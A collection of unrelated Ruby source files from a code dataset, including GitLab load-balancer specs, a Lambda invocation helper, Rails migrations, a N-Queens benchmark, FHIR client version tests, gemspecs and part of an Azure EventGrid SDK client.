'Gitlab::Database::LoadBalancing::LoadBalancer::PG::TRSerializationFailure',
conflict_error
)
end
it 'returns for a serialization error' do
expect(lb.serialization_failure?(conflict_error.new)).to eq(true)
end
it 'returns true for a wrapped error' do
wrapped = wrapped_exception(ActionView::Template::Error, conflict_error)
expect(lb.serialization_failure?(wrapped)).to eq(true)
end
end
describe '#select_up_to_date_host' do
let(:location) { 'AB/12345'}
let(:hosts) { lb.host_list.hosts }
let(:set_host) { request_cache[described_class::CACHE_KEY] }
subject { lb.select_up_to_date_host(location) }
context 'when none of the replicas are caught up' do
before do
expect(hosts).to all(receive(:caught_up?).with(location).and_return(false))
end
it 'returns false and does not update the host thread-local variable' do
expect(subject).to be false
expect(set_host).to be_nil
end
end
context 'when any of the replicas is caught up' do
before do
# `allow` for non-caught up host, because we may not even check it, if will find the caught up one earlier
allow(hosts[0]).to receive(:caught_up?).with(location).and_return(false)
expect(hosts[1]).to receive(:caught_up?).with(location).and_return(true)
end
it 'returns true and sets host thread-local variable' do
expect(subject).to be true
expect(set_host).to eq(hosts[1])
end
end
end
describe '#create_replica_connection_pool' do
it 'creates a new connection pool with specific pool size and name' do
with_replica_pool(5, 'other_host') do |replica_pool|
expect(replica_pool)
.to be_kind_of(ActiveRecord::ConnectionAdapters::ConnectionPool)
expect(replica_pool.db_config.host).to eq('other_host')
expect(replica_pool.db_config.pool).to eq(5)
expect(replica_pool.db_config.name).to end_with("_replica")
end
end
it 'allows setting of a custom hostname and port' do
with_replica_pool(5, 'other_host', 5432) do |replica_pool|
expect(replica_pool.db_config.host).to eq('other_host')
expect(replica_pool.db_config.configuration_hash[:port]).to eq(5432)
end
end
it 'does not modify connection class pool' do
expect { with_replica_pool(5) { } }.not_to change { ActiveRecord::Base.connection_pool }
end
def with_replica_pool(*args)
pool = lb.create_replica_connection_pool(*args)
yield pool
ensure
pool&.disconnect!
end
end
describe '#disconnect!' do
it 'calls disconnect on all hosts with a timeout', :skip_disconnect do
expect_next_instances_of(Gitlab::Database::LoadBalancing::Host, 2) do |host|
expect(host).to receive(:disconnect!).with(timeout: 30)
end
lb.disconnect!(timeout: 30)
end
end
end
| 29.417073 | 117 | 0.67996 |
79fdd22cf1083df5fbcc2c4026e30bf34646172c | 1,435 | class Lambchop::Cat
def self.cat(function_name, invoke_args, options = {})
self.new(function_name, invoke_args, options).cat
end
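  # Illustrative usage (function name and payload are hypothetical):
  #
  #   Lambchop::Cat.cat('my-function', '{"key":"value"}', invocation_type: :event, log_type: :tail)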
def initialize(function_name, invoke_args, options = {})
@function_name = function_name
@invoke_args = invoke_args
@client = options[:client] || Aws::Lambda::Client.new
@out = options[:out] || $stdout
@options = options
end
def cat
invoke_args = @invoke_args
if invoke_args.kind_of?(IO)
invoke_args = invoke_args.read
end
resp = @client.invoke(
:function_name => @function_name,
:payload => invoke_args,
:invocation_type => Lambchop::Utils.camelize(@options[:invocation_type] || :request_response),
:log_type => Lambchop::Utils.camelize(@options[:log_type] || :none)
)
out = {
'status_code' => resp[:status_code],
'function_error' => resp[:function_error],
'payload' => nil
}
log_result = resp[:log_result]
payload = resp[:payload]
if log_result
log_result = Base64.strict_decode64(log_result)
      # use non-destructive gsub: gsub! returns nil when nothing matches, which would break the chain
      log_result = log_result.gsub("\t", ' ').gsub(/\s+\n/, "\n").strip
def log_result.yaml_style() Psych::Nodes::Scalar::LITERAL end
out['log_result'] = log_result
end
if payload
payload_string = payload.string
out['payload'] = JSON.parse(payload_string) rescue payload_string
end
@out.puts YAML.dump(out)
end
end
| 27.596154 | 100 | 0.634843 |
e8b2c0d4adbd71568b15f28d8d36a2cda134056b | 315 | class AddNewCommunitySettings < ActiveRecord::Migration[5.2]
def change
add_column :communities, :facebook_connect_id, :string
add_column :communities, :facebook_connect_secret, :string
add_column :communities, :google_analytics_key, :string
add_column :communities, :favicon_url, :string
end
end
| 35 | 62 | 0.784127 |
abf29f9d95c6cc12094d930420de84b494487c4a | 2,142 | # This code is derived from the SOM benchmarks, see AUTHORS.md file.
#
# Copyright (c) 2015-2016 Stefan Marr <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
class Queens < Benchmark
def initialize
@free_maxs = nil
@free_rows = nil
@free_mins = nil
@queen_rows = nil
end
def benchmark
result = true
    10.times { result &&= queens }
    result
  end
def verify_result(result)
result
end
def queens
@free_rows = Array.new( 8, true)
@free_maxs = Array.new(16, true)
@free_mins = Array.new(16, true)
@queen_rows = Array.new( 8, -1)
place_queen(0)
end
def place_queen(c)
8.times do |r|
if get_row_column(r, c)
@queen_rows[r] = c
set_row_column(r, c, false)
return true if c == 7
return true if place_queen(c + 1)
set_row_column(r, c, true)
end
end
false
end
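  # A square (r, c) is free when its row and both diagonals are free:
  # r + c is constant along one diagonal (0..14) and c - r along the other
  # (-7..7, shifted by +7 so it indexes the 16-element @free_mins array).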
def get_row_column(r, c)
@free_rows[r] && @free_maxs[c + r] && @free_mins[c - r + 7]
end
def set_row_column(r, c, v)
@free_rows[r ] = v
@free_maxs[c + r ] = v
@free_mins[c - r + 7] = v
end
end
| 28.945946 | 79 | 0.681139 |
87b5af08aa631e84a44afe99f0089ce85cf121b7 | 212 | class Taxonomy < ActiveRecord::Base
has_many :taxons, inverse_of: :taxonomy, dependent: :destroy
has_many :classifications, inverse_of: :taxonomy, dependent: :destroy
validates :name, presence: true
end
| 23.555556 | 71 | 0.764151 |
7af450b2132a47b03817d56d863b428b0fff6b27 | 232 | class AddAssigneeToTarget < ActiveRecord::Migration[6.0]
def change
add_column :targets, :assignee_id, :integer
add_column :targets, :assignee_type, :string
add_index :targets, [:assignee_id, :assignee_type]
end
end
| 29 | 56 | 0.74569 |
08f8009ce6545d47532b1e4e19869efdf6fb949d | 431 | cask :v1 => 'radiant-player' do
version '1.3.3'
sha256 '93fe48f191c5b670704266eec8c25040d153051397420ce36cdf669a322270cf'
url "https://github.com/kbhomes/radiant-player-mac/releases/download/v#{version}/Radiant.Player.zip"
appcast 'https://github.com/kbhomes/radiant-player-mac/releases.atom'
name 'Radiant Player'
homepage 'http://kbhomes.github.io/radiant-player-mac/'
license :mit
app 'Radiant Player.app'
end
| 33.153846 | 102 | 0.763341 |
abed80c0a81ce10f8147c8eeb58fdd58b6426ea3 | 1,558 | # frozen_string_literal: true
require_relative '../test_helper'
SingleCov.covered! uncovered: 7
describe FlowdockNotification do
let(:deploy) { deploys(:succeeded_test) }
let(:notification) { FlowdockNotification.new(deploy) }
let(:endpoint) { "https://api.flowdock.com/v1/messages/team_inbox/x123yx" }
let(:chat_endpoint) { "https://api.flowdock.com/v1/messages/chat/x123yx" }
before do
deploy.stage.stubs(:flowdock_tokens).returns(["x123yx"])
FlowdockNotificationRenderer.stubs(:render).returns("foo")
end
it "sends a buddy request for all Flowdock flows configured for the stage" do
delivery = stub_request(:post, chat_endpoint)
notification.buddy_request('test message')
assert_requested delivery
end
it "notifies all Flowdock flows configured for the stage" do
delivery = stub_request(:post, endpoint)
notification.deliver
assert_requested delivery
end
it "renders a nicely formatted notification" do
stub_request(:post, endpoint)
FlowdockNotificationRenderer.stubs(:render).returns("bar")
notification.deliver
content = nil
assert_requested :post, endpoint do |request|
body = Rack::Utils.parse_query(request.body)
content = body.fetch("content")
end
content.must_equal "bar"
end
describe "#default_buddy_request_message" do
it "renders" do
message = notification.default_buddy_request_message
message.must_include ":pray: @team Super Admin is requesting approval to deploy Project **staging** to production"
end
end
end
| 29.961538 | 120 | 0.735558 |
b96d02d9fa7add5055758682ab9ddf575d192281 | 18,479 | require_relative '../test_helper'
class MultiversionTest < Test::Unit::TestCase
def test_autodetect_stu3
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
capabilitystatement = File.read(File.join(root, 'fixtures', 'capabilitystatement.json'))
stub_request(:get, /autodetect/).to_return(body: capabilitystatement)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_r4
assert client.cached_capability_statement.nil?
assert client.detect_version == :stu3, "Expected Version to be stu3, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Capability Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::STU3::CapabilityStatement)
assert client.default_format.include? 'json'
end
def test_autodetect_dstu2
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
conformance = File.read(File.join(root, 'fixtures', 'conformance.json'))
stub_request(:get, /autodetect/).to_return(body: conformance)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_r4
assert client.cached_capability_statement.nil?
assert client.detect_version == :dstu2, "Expected Version to be dstu2, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Conformance Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::DSTU2::Conformance)
assert client.default_format.include? 'json'
end
def test_autodetect_r4
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
conformance = File.read(File.join(root, 'fixtures', 'r4_capabilitystatement.json'))
stub_request(:get, /autodetect/).to_return(body: conformance)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_stu3
assert client.cached_capability_statement.nil?
assert (client.detect_version == :r4), "Expected Version to be r4, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Capability Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::CapabilityStatement)
assert client.default_format.include? 'json'
end
def test_stu3_patient_manual
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new.to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.read(FHIR::STU3::Patient, 'foo').resource.is_a?(FHIR::STU3::Patient)
end
def test_dstu2_patient_manual
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
assert client.read(FHIR::DSTU2::Patient, 'foo').resource.is_a?(FHIR::DSTU2::Patient)
end
def test_r4_patient_manual
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert client.read(FHIR::Patient, 'foo').resource.is_a?(FHIR::Patient)
end
def test_stu3_patient_klass_access
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new.to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
FHIR::STU3::Model.client = client
assert FHIR::STU3::Patient.read('foo').is_a?(FHIR::STU3::Patient)
end
def test_dstu2_patient_klass_access
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
FHIR::DSTU2::Model.client = client
assert FHIR::DSTU2::Patient.read('foo').is_a?(FHIR::DSTU2::Patient)
end
def test_r4_patient_klass_access
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
FHIR::Model.client = client
assert FHIR::Patient.read('foo').is_a?(FHIR::Patient)
end
def test_dstu2_reply_fhir_version
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
FHIR::DSTU2::Model.client = client
patient = FHIR::DSTU2::Patient.read('foo')
assert_equal :dstu2, client.reply.fhir_version
end
def test_stu3_reply_fhir_version
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
FHIR::STU3::Model.client = client
patient = FHIR::STU3::Patient.read('foo')
assert_equal :stu3, client.reply.fhir_version
end
def test_r4_reply_fhir_version
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
FHIR::Model.client = client
patient = FHIR::Patient.read('foo')
assert_equal :r4, client.reply.fhir_version
end
def test_stu3_accept_mime_type_json
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert_equal 'application/fhir+json', client.read(FHIR::STU3::Patient, 'foo').request[:headers]['Accept']
end
def test_r4_accept_mime_type_json
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert_equal 'application/fhir+json', client.read(FHIR::Patient, 'foo').request[:headers]['Accept']
end
def test_dstu2_accept_mime_type_json
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/json+fhir', client.read(FHIR::DSTU2::Patient, 'foo').request[:headers]['Accept']
end
def test_stu3_content_type_mime_type_json
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.create(FHIR::STU3::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+json')
end
def test_dstu2_content_type_mime_type_json
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert client.create(FHIR::DSTU2::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/json+fhir')
end
def test_r4_content_type_mime_type_json
stub_request(:post, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert client.create(FHIR::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+json')
end
def test_stu3_accept_mime_type_xml
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
assert_equal :stu3, client.fhir_version
assert_equal 'application/fhir+xml', client.read(FHIR::STU3::Patient, 'foo').request[:headers]['Accept']
end
def test_dstu2_accept_mime_type_xml
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/xml+fhir', client.read(FHIR::DSTU2::Patient, 'foo').request[:headers]['Accept']
end
def test_r4_accept_mime_type_xml
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
assert_equal :r4, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/fhir+xml', client.read(FHIR::Patient, 'foo').request[:headers]['Accept']
end
def test_stu3_content_type_mime_type_xml
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.create(FHIR::STU3::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+xml')
end
def test_r4_content_type_mime_type_xml
stub_request(:post, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
assert_equal :r4, client.fhir_version
assert client.create(FHIR::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+xml')
end
def test_dstu2_content_type_mime_type_xml
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert client.create(FHIR::DSTU2::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/xml+fhir')
end
def test_dstu2_transaction
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::DSTU2::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
end
def test_stu3_transaction
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::STU3::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
end
def test_r4_transaction
stub_request(:post, /r4/).to_return(body: FHIR::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
end
def test_dstu2_patient_record
bundle = FHIR::DSTU2::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::DSTU2::Bundle::Entry.new
bundle.entry.last.resource = FHIR::DSTU2::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://dstu2/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
reply = client.fetch_patient_record('example-patient')
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::DSTU2::Patient)
end
def test_stu3_patient_record
bundle = FHIR::STU3::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::STU3::Bundle::Entry.new
bundle.entry.last.resource = FHIR::STU3::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://stu3/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
reply = client.fetch_patient_record('example-patient')
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::STU3::Patient)
end
def test_r4_patient_record
bundle = FHIR::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::Bundle::Entry.new
bundle.entry.last.resource = FHIR::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://r4/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
reply = client.fetch_patient_record('example-patient')
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::Patient)
end
def test_dstu2_encounter_record
bundle = FHIR::DSTU2::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::DSTU2::Bundle::Entry.new
bundle.entry.last.resource = FHIR::DSTU2::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://dstu2/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
reply = client.fetch_encounter_record('example-encounter')
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::DSTU2::Encounter)
end
def test_stu3_encounter_record
bundle = FHIR::STU3::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::STU3::Bundle::Entry.new
bundle.entry.last.resource = FHIR::STU3::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://stu3/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
reply = client.fetch_encounter_record('example-encounter')
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::STU3::Encounter)
end
def test_r4_encounter_record
bundle = FHIR::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::Bundle::Entry.new
bundle.entry.last.resource = FHIR::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://r4/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
reply = client.fetch_encounter_record('example-encounter')
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::Encounter)
end
  def test_dstu2_terminology_code_system_lookup
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Parameters)
end
def test_stu3_terminology_code_system_lookup
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Parameters)
end
def test_r4_terminology_code_system_lookup
stub_request(:post, /r4/).to_return(body: FHIR::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Parameters)
end
end
| 41.713318 | 133 | 0.702203 |
6aac3aff8c67c9f121bc77dd41765d52bb55aa5e | 1,741 | # frozen_string_literal: true
lib = File.expand_path('../lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require_relative 'config/config'
Gem::Specification.new do |spec|
spec.name = 'facter-ng'
spec.version = FACTER_VERSION
spec.authors = ['Bogdan Irimie']
spec.email = ['[email protected]']
spec.summary = 'New version of Facter'
spec.description = 'New version of Facter'
# spec.homepage = " Put your gem's website or public repo URL here."
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
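  # For example, pushes could be limited to an internal gem server with something
  # like the following (the host below is purely illustrative):
  #
  #   spec.metadata['allowed_push_host'] = 'https://gems.example.com'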
  unless spec.respond_to?(:metadata)
    raise 'RubyGems 2.0 or newer is required to protect against ' \
          'public gem pushes.'
  end
  # Specify which files should be added to the gem when it is released.
  # The `git ls-files` command lists the files that have been added into git;
  # files under spec/ are excluded from the packaged gem.
spec.files = `git ls-files`.split("\n").select { |file_name| file_name.match('^((?!spec).)*$') }
spec.bindir = 'bin'
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'coveralls', '~> 0.8.23'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_development_dependency 'rubocop', '~> 0.74.0'
spec.add_development_dependency 'rubycritic', '~> 4.1.0'
spec.add_runtime_dependency 'bundler', '~> 2.0'
spec.add_runtime_dependency 'hocon', '1.3.0'
spec.add_runtime_dependency 'sys-filesystem', '~> 1.3'
spec.add_runtime_dependency 'thor', '~> 1.0.1'
end
| 38.688889 | 98 | 0.686387 |
5df51091f58578b8faa00d650c645b65d146be2a | 1,119 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'cocoapods-rocket/gem_version.rb'
Gem::Specification.new do |spec|
spec.name = 'cocoapods-rocket'
spec.version = CocoapodsRocket::VERSION
spec.authors = ['asynclog']
spec.email = ['[email protected]']
  spec.description   = %q{A longer description of cocoapods-rocket.}
  spec.summary       = %q{A short description of cocoapods-rocket.}
spec.homepage = 'https://github.com/EXAMPLE/cocoapods-rocket'
spec.license = 'MIT'
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'rake'
  spec.add_development_dependency 'rspec'
spec.add_runtime_dependency 'colored2'
spec.add_runtime_dependency 'fileutils'
spec.add_runtime_dependency 'json'
spec.add_runtime_dependency 'version_bumper'
end
| 36.096774 | 74 | 0.698838 |
0360737e2f51fdcb040ce23d7028b2076007b9ec | 742 | module Barometer
module Query
module Service
class GoogleGeocode
class Api < Utils::Api
def url
'http://maps.googleapis.com/maps/api/geocode/json'
end
def params
format_params
end
def unwrap_nodes
['results', 0]
end
private
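          # A rough illustration (values below are made up, not from the original
          # source): for a :coordinates query of '40.7,-74.0' with country code
          # 'US', format_params would return
          #   { sensor: 'false', region: 'US', latlng: '40.7,-74.0' }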
def format_params
params = { sensor: 'false' }
params[:region] = query.geo.country_code if query.geo.country_code
if query.format == :coordinates
params[:latlng] = query.q.dup
else
params[:address] = query.q.dup
end
params
end
end
end
end
end
end
| 20.611111 | 78 | 0.490566 |
b9c6e6238fef2105605ee412b7b10075fa19906a | 20,688 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2020_06_01
#
# Azure EventGrid Management Client
#
class PrivateLinkResources
include MsRestAzure
#
# Creates and initializes a new instance of the PrivateLinkResources class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [EventGridManagementClient] reference to the EventGridManagementClient
attr_reader :client
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param private_link_resource_name [String] The name of private link resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PrivateLinkResource] operation results.
#
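    # @example Rough sketch (assumes the management client exposes this class as
    #   #private_link_resources; resource names below are illustrative only)
    #   resource = client.private_link_resources.get('my-resource-group', 'topics',
    #     'my-topic', 'my-private-link-resource')
    #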
def get(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
response = get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param private_link_resource_name [String] The name of private link resource.
